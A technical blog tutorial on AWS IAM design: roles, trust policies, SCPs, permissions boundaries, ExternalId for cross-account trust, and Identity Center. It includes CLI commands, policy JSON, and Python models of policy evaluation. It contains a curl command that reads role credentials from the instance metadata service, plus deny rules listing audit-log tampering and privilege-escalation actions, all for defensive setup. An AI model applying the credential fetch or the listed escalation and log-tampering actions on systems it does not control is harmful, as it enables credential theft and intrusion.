One blueprint, six clouds, identical compliance grades. EP03 showed that the multi-cloud drift problem disappears when provider details are abstracted away from the blueprint.

What neither EP02 nor EP03 answered is the auditor’s question: how do you know the image is actually compliant? “We ran CIS L1” is not an answer. “Grade A, 98/100 controls, SARIF export attached” is.

EP04 covers automated OpenSCAP compliance: the post-build scan in detail — how the A-F grade is calculated, what controls block an A grade, how SARIF exports work, and how drift detection catches what changed after deployment.

Next: automated OpenSCAP compliance — CIS benchmark grading before deployment

Get EP04 in your inbox when it publishes → linuxcent.com/subscribe

AWS IAM Deep Dive: Users, Groups, Roles, and Policies Explained

May 10, 2026 | April 14, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM

TL;DR

IAM users with long-lived access keys are legacy — use IAM Identity Center with federation; static keys are a security finding, not a feature
Roles issue temporary credentials via STS — the right identity model for every service (Lambda, EC2, ECS, CI/CD)
Every role has two required configs: trust policy (who can assume it) + permission policy (what it can do) — both must be correct
SCPs set the org-level ceiling; they cannot grant permissions and do not apply to the management account
Permissions boundaries set an identity-level ceiling — effective permissions are the intersection with identity-based policies, not the union
Cross-account trust without an ExternalId condition is vulnerable to the confused deputy attack — always include it with third-party trust
One role per service, never shared — a shared role’s blast radius is the union of what every consumer needs

The Big Picture

AWS IAM evaluates every API call through a specific chain. Understanding this chain is how you debug access issues and how you design guardrails that actually hold.

  AWS POLICY EVALUATION — every API call walks this chain top to bottom
  An explicit DENY at any step ends evaluation immediately.

         API call arrives
               │
               ▼
  ┌────────────────────────────┐
  │  Explicit DENY in any SCP? │── YES ──────────────────────────► DENIED
  └────────────────┬───────────┘     (cannot be overridden by anything)
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  SCP present with no ALLOW │── YES ──────────────────────────► DENIED
  └────────────────┬───────────┘
                   │ NO (or no SCP / management account)
                   ▼
  ┌────────────────────────────┐
  │  Explicit DENY in any      │── YES ──────────────────────────► DENIED
  │  identity or resource      │
  │  policy?                   │
  └────────────────┬───────────┘
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  Resource-based policy     │── YES (same-account principal) ──► ALLOWED*
  │  with ALLOW?               │
  └────────────────┬───────────┘   *unless denied above
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  Permissions boundary      │── YES, boundary has NO ALLOW ───► DENIED
  │  attached?                 │
  └────────────────┬───────────┘
                   │ NO boundary, or boundary ALLOWS
                   ▼
  ┌────────────────────────────┐
  │  Session policy attached   │── YES, session has NO ALLOW ────► DENIED
  │  (role assumption)?        │
  └────────────────┬───────────┘
                   │ NO session policy, or session ALLOWS
                   ▼
  ┌────────────────────────────┐
  │  Identity-based policy     │── YES ──────────────────────────► ALLOWED
  │  with ALLOW?               │
  └────────────────┬───────────┘
                   │ NO
                   ▼
                DENIED (default — nothing explicitly granted)

  Debugging AccessDenied: work bottom-up.
  Start with the identity-based policy. Then boundary. Then SCP.
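The chain in the diagram can be written down as a short function. This is a deliberately simplified model for reasoning about AccessDenied, not a reimplementation of AWS: it assumes a same-account principal, matches on action names only, and ignores resources, conditions, and the management account exemption. All names are illustrative.

```python
from fnmatch import fnmatchcase


def _matches(statements, effect, action):
    """True if any statement with this effect has a pattern matching action."""
    return any(
        s["Effect"] == effect
        and any(fnmatchcase(action.lower(), p.lower()) for p in s["Action"])
        for s in statements
    )


def evaluate(action, identity, scp=None, resource=None, boundary=None, session=None):
    """Walk the chain from the diagram for a same-account principal.

    Each argument is a list of {"Effect", "Action"} statements, or None when
    that policy type is not attached.
    """
    attached = [p for p in (scp, resource, boundary, session, identity) if p is not None]
    if any(_matches(p, "Deny", action) for p in attached):
        return "DENIED (explicit deny)"
    if scp is not None and not _matches(scp, "Allow", action):
        return "DENIED (SCP)"
    if resource is not None and _matches(resource, "Allow", action):
        return "ALLOWED (resource policy)"
    if boundary is not None and not _matches(boundary, "Allow", action):
        return "DENIED (boundary)"
    if session is not None and not _matches(session, "Allow", action):
        return "DENIED (session policy)"
    if _matches(identity, "Allow", action):
        return "ALLOWED (identity policy)"
    return "DENIED (default)"


identity = [{"Effect": "Allow", "Action": ["s3:*", "ec2:*"]}]
boundary = [{"Effect": "Allow", "Action": ["s3:*", "dynamodb:*"]}]
scp = [
    {"Effect": "Allow", "Action": ["*"]},
    {"Effect": "Deny", "Action": ["cloudtrail:StopLogging"]},
]

print(evaluate("s3:GetObject", identity, scp=scp, boundary=boundary))
print(evaluate("ec2:RunInstances", identity, scp=scp, boundary=boundary))
print(evaluate("cloudtrail:StopLogging", identity, scp=scp, boundary=boundary))
```

The three calls return an identity-policy allow, a boundary denial, and an explicit deny, in that order. For real debugging, aws iam simulate-principal-policy remains the authoritative tool.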

Introduction

What most teams miss about AWS IAM is the difference between a model that works under deadline and one that survives scale, audits, and staff turnover. If you’ve read IAM roles vs policies and understand the three-layer stack, this is where it becomes specific to AWS: trust policies, SCPs, permissions boundaries, cross-account trust, and Identity Center.

In 2017 I was asked to help clean up an AWS account that had been running in production for two years. The team had built something real — a microservices application, a data pipeline, a CI/CD system. Competent engineers. But nobody had been specifically accountable for IAM.

When I pulled the configuration:

One IAM user with AdministratorAccess shared by the entire dev team. Password in a shared password manager. Access key three years old.
Six Lambda functions each carrying AWSLambdaFullAccess, AmazonS3FullAccess, and AmazonDynamoDBFullAccess — three broad managed policies each, instead of one custom policy with what each function actually needed.
A CI/CD pipeline role with iam:* on * because someone once needed to create a role during a deployment and found that the easiest path.
Three IAM users for contractors who had finished their engagements months earlier. Still active, access keys still valid.

None of this was malicious. All of it was the result of reaching for the broadest thing that works, under deadline, without a framework for IAM decisions.

AWS IAM is the most flexible cloud IAM system. That flexibility is the problem. If you don’t know the full model, you default to broad grants because they’re easier to reason about. Broad things accumulate into exposure. This episode is the full model.

AWS IAM Identity Types: Users, Groups, and Roles Compared

IAM Users: Why Static Access Keys Are a Security Finding

An IAM user is a permanent identity with long-lived credentials: a password for console access, and optionally an access key pair. The access key never expires on its own; it stays valid until someone deactivates or deletes it.

# Create a user
aws iam create-user --user-name alice

# Generate an access key (it has no expiry; it stays valid until deactivated or deleted)
aws iam create-access-key --user-name alice

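# Register a virtual MFA device for console access (enforcing MFA additionally needs a policy condition on aws:MultiFactorAuthPresent)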
aws iam create-virtual-mfa-device \
  --virtual-mfa-device-name alice-mfa \
  --outfile /tmp/alice-mfa.png \
  --bootstrap-method QRCodePNG

aws iam enable-mfa-device \
  --user-name alice \
  --serial-number arn:aws:iam::123456789012:mfa/alice-mfa \
  --authentication-code1 123456 \
  --authentication-code2 654321

The access key exists the moment you create it. It survives team changes, org restructures, and offboarding unless someone explicitly deletes it. In practice, access keys are where I find the oldest, most-forgotten credentials in every AWS account I’ve audited.

Current best practice: don’t create IAM users for human access. Use IAM Identity Center with federation. Static access keys are a finding, not a feature.
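Finding those forgotten keys is mostly date arithmetic. The sketch below works on data shaped like the AccessKeyMetadata entries from aws iam list-access-keys, with CreateDate already parsed. The 90-day threshold, the function name, and the sample records are assumptions for illustration.

```python
from datetime import datetime, timedelta, timezone


def stale_keys(key_metadata, now, max_age_days=90):
    """Return (user, key id, age in days) for active keys older than max_age_days.

    key_metadata is a list of dicts with UserName, AccessKeyId, Status, and a
    timezone-aware CreateDate.
    """
    limit = timedelta(days=max_age_days)
    return [
        (k["UserName"], k["AccessKeyId"], (now - k["CreateDate"]).days)
        for k in key_metadata
        if k["Status"] == "Active" and now - k["CreateDate"] > limit
    ]


# Made-up sample data; the key IDs are placeholders, not real credentials.
now = datetime(2026, 4, 14, tzinfo=timezone.utc)
keys = [
    {"UserName": "alice", "AccessKeyId": "AKIAEXAMPLEOLD", "Status": "Active",
     "CreateDate": datetime(2023, 4, 14, tzinfo=timezone.utc)},
    {"UserName": "bob", "AccessKeyId": "AKIAEXAMPLENEW", "Status": "Active",
     "CreateDate": datetime(2026, 3, 1, tzinfo=timezone.utc)},
]

for user, key_id, age in stale_keys(keys, now):
    print(f"{user}: {key_id} is {age} days old")
```

Passing the current time in as an argument keeps the function deterministic, which makes it easy to run against a saved IAM snapshot.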

IAM groups — useful but limited

Groups are collections of users. Policies attached to a group apply to all members. Useful as a middle layer, but limited: you can’t add roles or services to a group, and if you’re moving toward Identity Center, groups in IAM become less relevant.

aws iam create-group --group-name Backend-Developers
aws iam attach-group-policy \
  --group-name Backend-Developers \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
aws iam add-user-to-group --group-name Backend-Developers --user-name alice

IAM Roles: How STS Temporary Credentials Work

A role is an identity without permanent credentials. It is assumed by entities — services, users, external systems — and STS issues temporary credentials. Those credentials expire. Nothing to rotate.

# Create a role that EC2 can assume
cat > ec2-trust-policy.json << 'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "Service": "ec2.amazonaws.com" },
    "Action": "sts:AssumeRole"
  }]
}
EOF

aws iam create-role \
  --role-name AppServerRole \
  --assume-role-policy-document file://ec2-trust-policy.json

aws iam attach-role-policy \
  --role-name AppServerRole \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

# EC2 needs an instance profile to carry the role
aws iam create-instance-profile --instance-profile-name AppServerProfile
aws iam add-role-to-instance-profile \
  --instance-profile-name AppServerProfile \
  --role-name AppServerRole

# Launch with the profile
aws ec2 run-instances \
  --image-id ami-0abcdef1234567890 \
  --instance-type t3.micro \
  --iam-instance-profile Name=AppServerProfile

From inside the instance — no credential files, no configuration:

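# IMDSv2: get a session token, then request the role's credentials
TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/AppServerRole
# Returns: AccessKeyId, SecretAccessKey, Token, Expiration
# AWS refreshes these before they expire. The application never sees a rotation event.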

Lambda, ECS, and other services use different attachment mechanisms but the same model.

AWS IAM Policy Types: Managed, Inline, SCP, and Boundaries

Managed vs inline policies

┌────────────────────┬──────────────────────────────────┬──────────────────────────────────────┐
│ Type               │ Description                      │ Use when                             │
├────────────────────┼──────────────────────────────────┼──────────────────────────────────────┤
│ AWS Managed        │ Created by AWS, read-only        │ Quick prototyping; never production  │
│ Customer Managed   │ Created by you, reusable         │ Standard production permissions      │
│ Inline             │ Embedded in user/group/role      │ Explicit 1:1 non-transferable binding│
└────────────────────┴──────────────────────────────────┴──────────────────────────────────────┘

AWS Managed policies like AmazonS3FullAccess are convenient and dangerous for the same reason: broad by design, meant to cover every use case. For a Lambda that reads one specific bucket, AmazonS3FullAccess grants s3:* on every bucket in the account, when the function needs two actions on one bucket.

# Create a customer managed policy — scoped to what the Lambda actually does
cat > lambda-reader-policy.json << 'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "ReadSpecificBucket",
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": [
      "arn:aws:s3:::app-data-prod",
      "arn:aws:s3:::app-data-prod/*"
    ]
  }]
}
EOF

aws iam create-policy \
  --policy-name LambdaS3ReadPolicy \
  --policy-document file://lambda-reader-policy.json

aws iam attach-role-policy \
  --role-name lambda-image-processor-role \
  --policy-arn arn:aws:iam::123456789012:policy/LambdaS3ReadPolicy

Service Control Policies — org-wide guardrails

SCPs attach to AWS Organization OUs or accounts. They define the maximum permissions any identity in that scope can have. They cannot grant — only restrict.

Two SCPs I apply to every account from day one:

// Region restriction — blast radius control
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": "*",
    "Resource": "*",
    "Condition": {
      "StringNotEquals": {
        "aws:RequestedRegion": ["ap-south-1", "us-east-1", "eu-west-1"]
      }
    }
  }]
}

// Protect the audit trail — anti-forensics control
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": [
      "cloudtrail:StopLogging",
      "cloudtrail:DeleteTrail",
      "cloudtrail:UpdateTrail"
    ],
    "Resource": "*"
  }]
}

The region restriction limits where compromised credentials can operate. The CloudTrail restriction means even an AdministratorAccess compromise cannot erase the audit trail. The attacker knows they’re being logged and cannot stop it. This is the authorization layer — understanding authentication vs authorization makes clear why SCPs operate at Gate 2, not Gate 1.
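The region SCP relies on how a negated operator treats a list of values, which is easy to get backwards. A minimal sketch of that one condition follows; the function name is illustrative and the model covers only this single condition key.

```python
def region_scp_denies(requested_region, allowed_regions):
    """Mirror the Deny + StringNotEquals logic of the region SCP above.

    With several values, StringNotEquals is true only when the request value
    differs from every listed value, so the Deny fires for unlisted regions.
    """
    return all(requested_region != region for region in allowed_regions)


ALLOWED = ["ap-south-1", "us-east-1", "eu-west-1"]

print(region_scp_denies("ap-south-1", ALLOWED))  # False: request proceeds
print(region_scp_denies("sa-east-1", ALLOWED))   # True: request is denied
```

Keeping us-east-1 in the list matters in practice, since several global services are served from that region.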

Permissions boundaries — identity-level ceilings

A permissions boundary sets the maximum permissions for a specific user or role. Effective permissions are the intersection of what the boundary allows and what identity-based policies grant.

Boundary allows:  s3:*, dynamodb:*
Identity policy:  s3:*, ec2:*
──────────────────────────────────
Effective:        s3:*             ← the intersection only

// Boundary: this role can use at most S3 and DynamoDB
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:*", "dynamodb:*"],
    "Resource": "*"
  }]
}

aws iam put-role-permissions-boundary \
  --role-name DevTeamRole \
  --permissions-boundary arn:aws:iam::123456789012:policy/DevTeamBoundary

I use permissions boundaries for safe IAM delegation. When a dev team needs to create their own roles for their services, I give them iam:CreateRole and iam:AttachRolePolicy — but require any role they create to have a specific boundary. They can self-service IAM without accidentally creating a role more powerful than their team should have.
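The delegation described above can be sketched as a policy document. The example builds it as a Python dictionary and prints the JSON. The Sid is made up and the wildcard resource is a simplification; the boundary ARN is the one used in the command above, and iam:PermissionsBoundary is the IAM condition key that carries the boundary attached to the role in the request.

```python
import json

# The boundary policy every delegated role must carry.
BOUNDARY_ARN = "arn:aws:iam::123456789012:policy/DevTeamBoundary"

delegation_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "CreateRolesOnlyWithBoundary",  # illustrative name
        "Effect": "Allow",
        "Action": ["iam:CreateRole", "iam:AttachRolePolicy"],
        "Resource": "*",
        # Allow the call only when the role carries the required boundary.
        "Condition": {"StringEquals": {"iam:PermissionsBoundary": BOUNDARY_ARN}},
    }],
}

print(json.dumps(delegation_policy, indent=2))
```

A production version would likely also deny removing or replacing the boundary (iam:DeleteRolePermissionsBoundary, iam:PutRolePermissionsBoundary), otherwise the ceiling can be lifted after the role is created.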

How AWS Cross-Account IAM Trust Works

AWS accounts are IAM isolation boundaries. An identity in Account A has zero access to Account B by default. Cross-account access requires explicit configuration on both sides.

Account B creates a role with a trust policy naming Account A's identity.
Account A's identity has permission to call sts:AssumeRole on that role.

// Account B: trust policy on the cross-account role
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "AWS": "arn:aws:iam::ACCOUNT_A_ID:role/DeployPipelineRole"
    },
    "Action": "sts:AssumeRole",
    "Condition": {
      "StringEquals": { "sts:ExternalId": "unique-external-id-12345" }
    }
  }]
}

# Account A: the pipeline assumes the cross-account role
aws sts assume-role \
  --role-arn arn:aws:iam::ACCOUNT_B_ID:role/DeployTarget \
  --role-session-name pipeline-deploy \
  --external-id unique-external-id-12345

# Export the temporary credentials and operate in Account B
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws s3 ls s3://account-b-bucket/

The ExternalId condition prevents the confused deputy attack. Without it, if you operate a service that assumes roles on behalf of customers, an attacker who learns a victim customer’s role ARN can register that ARN under their own tenant and trick your service into assuming the victim’s role.

The ExternalId is a shared secret proving the party requesting assumption is the one who established the trust. Always include it for third-party cross-account trust.
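A small simulation shows why the condition closes the hole. This is a simplified trust check, assuming a multi-tenant vendor service that presents a per-customer external ID on every assumption. The ARNs, IDs, and function name are hypothetical.

```python
def can_assume(trust_statement, caller_arn, external_id=None):
    """Simplified trust-policy check: principal match plus optional ExternalId."""
    if trust_statement["Principal"]["AWS"] != caller_arn:
        return False
    condition = trust_statement.get("Condition", {}).get("StringEquals", {})
    required = condition.get("sts:ExternalId")
    return required is None or required == external_id


# Hypothetical multi-tenant service role and per-customer external IDs.
SERVICE_ARN = "arn:aws:iam::111111111111:role/VendorService"
EXTERNAL_IDS = {"victim": "id-victim-7f3a", "attacker": "id-attacker-91c2"}

victim_trust = {
    "Principal": {"AWS": SERVICE_ARN},
    "Condition": {"StringEquals": {"sts:ExternalId": EXTERNAL_IDS["victim"]}},
}
victim_trust_no_id = {"Principal": {"AWS": SERVICE_ARN}}

# The attacker registers the victim's role ARN under the attacker's tenant,
# so the service presents the attacker's external ID when it assumes the role.
print(can_assume(victim_trust_no_id, SERVICE_ARN, EXTERNAL_IDS["attacker"]))  # True
print(can_assume(victim_trust, SERVICE_ARN, EXTERNAL_IDS["attacker"]))        # False
print(can_assume(victim_trust, SERVICE_ARN, EXTERNAL_IDS["victim"]))          # True
```

The protection depends on the service choosing the external ID per customer. If customers could supply their own, the attacker would simply supply the victim's.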

AWS IAM Identity Center: Federated Human Access Without Static Keys

IAM Identity Center (formerly AWS SSO) is the modern answer to “how do engineers access AWS accounts?” It federates an external IdP and maps your organization’s groups to Permission Sets.

  Okta / Google Workspace / Entra ID
    ↓ SAML 2.0 (SCIM for user and group sync)
  IAM Identity Center
    ↓ Permission Sets (collections of policies)
  Account Assignments (group → permission set → account)
    ↓
  Temporary credentials in each target account (no long-lived keys)

# Configure CLI access via Identity Center
aws configure sso
# Prompts: SSO start URL, region, account, role

# Login — browser opens for IdP auth
aws sso login --profile prod-admin

# Use normally — credentials are temporary and auto-refreshed
aws s3 ls --profile prod-admin
aws ec2 describe-instances --profile prod-admin

When someone leaves the organization: disable them in your IdP. Their SSO session expires, their temporary credentials expire, access is gone. That’s it — no access key hunting across 20 accounts.

AWS IAM Patterns for Production: What Survives Scale

Every Lambda, ECS task, and EC2 application gets its own role. Even two Lambdas doing similar things. The moment you share a role, its permissions are the union of what each consumer needs — and a compromise of one consumer exposes the full union.

# Dedicated execution role — specific to this function's actual needs
aws iam create-role \
  --role-name lambda-invoice-processor-role \
  --assume-role-policy-document \
  '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"lambda.amazonaws.com"},"Action":"sts:AssumeRole"}]}'

aws iam put-role-policy \
  --role-name lambda-invoice-processor-role \
  --policy-name InvoiceProcessorPolicy \
  --policy-document file://lambda-invoice-processor-policy.json

IAM escalation guardrail

Any role that isn’t an explicit IAM admin should have a guardrail blocking escalation actions:

{
  "Sid": "DenyIAMEscalation",
  "Effect": "Deny",
  "Action": [
    "iam:CreateUser", "iam:CreateRole", "iam:AttachRolePolicy",
    "iam:PutRolePolicy", "iam:PassRole", "iam:CreateAccessKey"
  ],
  "Resource": "*",
  "Condition": {
    "StringNotEquals": {
      "aws:PrincipalArn": "arn:aws:iam::123456789012:role/InfraAdminRole"
    }
  }
}

Even if a role gets over-permissioned, it cannot create users, escalate its own privileges, or pass roles to expand its access. Defense in depth against the privilege escalation paths covered in AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise.

Least privilege with tag conditions

{
  "Effect": "Allow",
  "Action": ["ec2:StartInstances", "ec2:StopInstances", "ec2:RebootInstances"],
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringEquals": {
      "aws:ResourceTag/Environment": "dev",
      "aws:ResourceTag/Owner": "${aws:username}"
    }
  }
}

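A developer can control EC2 instances in dev, specifically the ones tagged as theirs. Not prod. Not someone else’s instances. Note that ${aws:username} resolves only for IAM users; for an assumed role or an Identity Center session, match on a principal tag instead, for example ${aws:PrincipalTag/Owner}. This is ABAC, and it eliminates a class of privilege escalation through direct resource access.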
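The tag condition can be modeled in a few lines to see which requests it lets through. This sketch covers only the two StringEquals checks in the policy above. The function name and the sample tags are illustrative, and the username argument stands in for the resolved ${aws:username} variable.

```python
def tag_condition_allows(resource_tags, username, environment="dev"):
    """Evaluate the two StringEquals tag checks from the policy above.

    Multiple keys inside one condition operator are ANDed, so both the
    Environment tag and the Owner tag must match. A missing tag, or a
    caller with no username, never matches.
    """
    owner = resource_tags.get("Owner")
    return (
        resource_tags.get("Environment") == environment
        and owner is not None
        and owner == username
    )


# Made-up instances and users for illustration.
print(tag_condition_allows({"Environment": "dev", "Owner": "alice"}, "alice"))   # True
print(tag_condition_allows({"Environment": "prod", "Owner": "alice"}, "alice"))  # False
print(tag_condition_allows({"Environment": "dev", "Owner": "bob"}, "alice"))     # False
print(tag_condition_allows({"Environment": "dev"}, None))                        # False
```

The last case is the one to watch: an untagged instance combined with a caller that has no username must not be treated as a match.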

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — SCPs don't apply to the management account          ║
║                                                                      ║
║  SCPs are applied to member accounts and OUs — not to the org      ║
║  management account. Guardrails you apply to member accounts do    ║
║  not protect the management account itself.                         ║
║                                                                      ║
║  Fix: lock down the management account separately. Use it only for  ║
║  billing and org management. Never run workloads in it.             ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary ≠ policy grant                 ║
║                                                                      ║
║  A boundary that allows s3:* does NOT grant S3 access. The         ║
║  boundary is a ceiling. Effective permissions are the intersection  ║
║  of boundary + identity policy. Both must explicitly Allow.         ║
║                                                                      ║
║  Fix: after setting a boundary, check effective permissions with:   ║
║  aws iam simulate-principal-policy                                  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — Cross-account trust without ExternalId              ║
║                                                                      ║
║  A trust policy that names any principal from Account A without     ║
║  ExternalId can be exploited if you operate a multi-tenant service. ║
║  An attacker can craft a request that tricks your service into      ║
║  assuming a victim's role (confused deputy).                        ║
║                                                                      ║
║  Fix: always add ExternalId condition to third-party trust policies.║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 4 — iam:* on * in CI/CD role                           ║
║                                                                      ║
║  "The pipeline needs to create roles" is a legitimate requirement.  ║
║  Granting iam:* on * is not. It lets the pipeline create any role  ║
║  with any permissions — effectively full account access.            ║
║                                                                      ║
║  Fix: grant specific iam: actions, require all created roles to     ║
║  carry a permissions boundary. Delegate without escalating.         ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌───────────────────────────┬─────────────────────────────────────────────────────────────────┐
│ Term                      │ What it is                                                      │
├───────────────────────────┼─────────────────────────────────────────────────────────────────┤
│ IAM User                  │ Permanent identity with long-lived credentials (legacy)         │
│ IAM Role                  │ Assumable identity; STS issues temp creds (preferred)           │
│ Trust policy              │ Who can assume this role (separate from permissions)            │
│ Instance profile          │ Container that attaches a role to an EC2 instance               │
│ AWS Managed policy        │ Broad, maintained by AWS; avoid in production                   │
│ Customer Managed policy   │ You own it, you scope it; the correct default                   │
│ Inline policy             │ 1:1 binding, non-reusable; use only when intentional            │
│ SCP                       │ Org-level guardrail; constrains, does not grant                 │
│ Permissions boundary      │ Identity-level ceiling; intersection with policy = effective    │
│ Session policy            │ Restricts a specific role assumption session                    │
│ ExternalId                │ Agreed-upon ID in cross-account trust; prevents confused deputy │
│ IAM Identity Center       │ Federated human access via SSO; no long-lived keys              │
│ Permission Set            │ Policy collection in Identity Center → becomes role in account  │
└───────────────────────────┴─────────────────────────────────────────────────────────────────┘

Commands to know:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # Simulate a policy before deploying — will this call succeed?                      │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/MyRole \                            │
│    --action-names s3:GetObject \                                                      │
│    --resource-arns arn:aws:s3:::my-bucket/*                                          │
│                                                                                        │
│  # Full IAM snapshot of the account — all users, roles, policies, groups            │
│  aws iam get-account-authorization-details --output json > iam-snapshot.json         │
│                                                                                        │
│  # Find unused permissions — what does this role actually call?                      │
│  aws iam generate-service-last-accessed-details \                                     │
│    --arn arn:aws:iam::ACCOUNT:role/MyRole                                            │
│  aws iam get-service-last-accessed-details --job-id JOB_ID                           │
│                                                                                        │
│  # List all access keys and their age                                                │
│  aws iam list-users --query 'Users[].UserName' --output text | \                    │
│    xargs -n1 aws iam list-access-keys --user-name                                   │
│                                                                                        │
│  # Check effective permissions boundary on a role                                    │
│  aws iam get-role --role-name MyRole \                                               │
│    --query 'Role.PermissionsBoundary'                                                │
│                                                                                        │
│  # Assume a cross-account role                                                       │
│  aws sts assume-role \                                                                │
│    --role-arn arn:aws:iam::TARGET_ACCOUNT:role/CrossAccountRole \                   │
│    --role-session-name deploy-session \                                               │
│    --external-id your-external-id                                                    │
└────────────────────────────────────────────────────────────────────────────────────────┘
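The two last-accessed commands above work as a pair: the first starts an asynchronous job, and the second reads its result once the job finishes. A minimal sketch of chaining them is shown here. The function name `unused_services` is hypothetical, and the sketch assumes the AWS CLI is installed with credentials allowed to make both calls. It ignores pagination, so very large reports may come back truncated.

```shell
# Hypothetical helper: print service namespaces a role may use but has never called.
unused_services() {
  role_arn="$1"

  # Start the report job and capture its ID.
  job_id=$(aws iam generate-service-last-accessed-details \
    --arn "$role_arn" --query 'JobId' --output text) || return 1

  # Poll until the job leaves the IN_PROGRESS state.
  while :; do
    status=$(aws iam get-service-last-accessed-details \
      --job-id "$job_id" --query 'JobStatus' --output text) || return 1
    [ "$status" = "IN_PROGRESS" ] || break
    sleep 2
  done
  [ "$status" = "COMPLETED" ] || return 1

  # Services with zero authenticated entities were not accessed in the tracking period.
  aws iam get-service-last-accessed-details --job-id "$job_id" \
    --query 'ServicesLastAccessed[?TotalAuthenticatedEntities==`0`].ServiceNamespace' \
    --output text
}

# Usage: unused_services arn:aws:iam::ACCOUNT:role/MyRole
```

The output is a candidate list for trimming the role's policies, not a verdict: a service that is called only rarely may still be required.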

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	AWS IAM is the most widely deployed cloud IAM system; this covers the full model
CISSP	Domain 6 — Security Assessment and Testing	Policy evaluation logic is the foundation for cloud security assessments
ISO 27001:2022	5.15 Access control	Access control policy in AWS — SCPs, identity-based policies, resource-based policies
ISO 27001:2022	5.18 Access rights	User and role provisioning, permission boundaries, Identity Center assignments
ISO 27001:2022	8.2 Privileged access rights	IAM Identity Center, SCPs as org-level guardrails, least-privilege role design
SOC 2	CC6.1	AWS IAM is the primary technical control for CC6.1 in AWS-hosted environments
SOC 2	CC6.3	Identity Center with federation enables auditable access provisioning and removal
SOC 2	CC6.6	Cross-account trust relationships and ExternalId address third-party access controls

Key Takeaways

IAM users with static access keys are legacy for human access: use IAM Identity Center with federation instead, because long-lived keys are a recurring audit finding
Roles issue temporary credentials and are the right identity for every service — Lambda, EC2, ECS, CI/CD, cross-account
Trust policy controls who can assume a role; permission policy controls what the role can do — debug both when access fails
SCPs cap maximum permissions at org level and cannot be overridden — use them for region restriction and audit trail protection; they do not apply to the management account
Permissions boundaries cap at identity level — effective permissions are the intersection with identity-based policies, not the union
Cross-account trust without ExternalId is vulnerable to the confused deputy problem: always require it in trust policies for third parties
One role per service; share nothing — a shared role’s blast radius is the union of every consumer’s required permissions
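The trust policy and ExternalId takeaways above meet in a single document: the trust policy of the role a third party assumes. A minimal sketch follows, assuming a hypothetical `VENDOR_ACCOUNT` placeholder for the third party's account ID and reusing the `CrossAccountRole` and `your-external-id` placeholders from the assume-role command in this article. The file name is also an assumption.

```shell
# Trust policy for a role that a third party assumes (placeholders throughout).
cat > third-party-trust.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::VENDOR_ACCOUNT:root" },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": { "sts:ExternalId": "your-external-id" }
      }
    }
  ]
}
EOF

# Apply it to an existing role, for example:
# aws iam update-assume-role-policy --role-name CrossAccountRole \
#   --policy-document file://third-party-trust.json
```

With this condition in place, an `sts:AssumeRole` call that omits `--external-id` or passes a different value is denied, even when it comes from the trusted account. This document only controls who can assume the role; what the role can do still comes from its permission policies.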

What’s Next

EP05 moves to GCP IAM — a fundamentally different model where the resource hierarchy drives access inheritance. A misconfiguration at the folder level affects every project below it. We’ll cover why roles/editor keeps appearing in production audits and how to build a GCP IAM structure that composes correctly up the hierarchy.


Next: GCP IAM Policy Inheritance: How the Resource Hierarchy Controls Access